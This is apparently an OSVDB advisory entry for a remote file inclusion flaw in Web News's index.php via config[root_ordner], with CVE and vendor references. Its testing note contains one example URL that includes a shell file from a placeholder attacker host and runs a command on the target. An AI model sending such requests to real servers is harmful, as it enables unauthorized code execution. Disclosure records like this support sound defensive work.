Web News index.php config[root_ordner] Variable Remote File Inclusion

2007-08-09T00:00:00
ID OSVDB:36427
Type osvdb
Reporter Rizgar()
Modified 2007-08-09T00:00:00

Description

Technical Description

This vulnerability is only present when the register_globals PHP option is set to 'on'. This has not been the default setting for PHP installs since version 4.2.0 (22-Apr-2002).

Manual Testing Notes

http://[target]/index.php?config[root_ordner]=http://[attacker]/shell.txt?&cmd=id

References:

Secunia Advisory ID:26398 Related OSVDB ID: 36428 Related OSVDB ID: 36429 Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2007-08/0114.html ISS X-Force ID: 35925 FrSIRT Advisory: ADV-2007-2839 CVE-2007-4329 Bugtraq ID: 25257